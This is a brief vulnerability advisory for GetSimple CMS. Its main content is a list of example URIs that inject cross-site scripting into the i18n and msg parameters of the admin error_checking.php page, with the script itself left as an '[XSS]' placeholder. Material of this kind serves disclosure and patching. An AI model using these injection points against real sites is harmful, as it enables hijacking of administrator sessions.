GetSimple CMS Multiple Vulnerabilities

GetSimple CMS Multiple Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/admin/template/error_checking.php?upd=bak-success&i18n[ER_BAKUP_DELETED]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=bak-err&i18n[ER_REQ_PROC_FAIL]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=bak-err&i18n[ERROR]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=edit&i18n[ER_YOUR_CHANGES]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=restore&i18n[ER_HASBEEN_REST]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[ER_HASBEEN_DEL]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[UNDO]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=edit-index&i18n[ER_CANNOT_INDEX]=[XSS]
http://www.example.com/admin/template/error_checking.php?restored=true&i18n[ER_OLD_RESTORED]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=pwd-success&i18n[ER_NEW_PWD_SENT]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=pwd-error&i18n[ER_SENDMAIL_ERR]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=del-success&i18n[ER_FILE_DEL_SUC]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=del-error&i18n[ER_PROBLEM_DEL]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=comp-success&i18n[ER_COMPONENT_SAVE]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=comp-restored&i18n[ER_COMPONENT_REST]=[XSS]
http://www.example.com/admin/template/error_checking.php?cancel=test&i18n[ER_CANCELLED_FAIL]=[XSS]
http://www.example.com/admin/template/error_checking.php?err=true&msg=[XSS]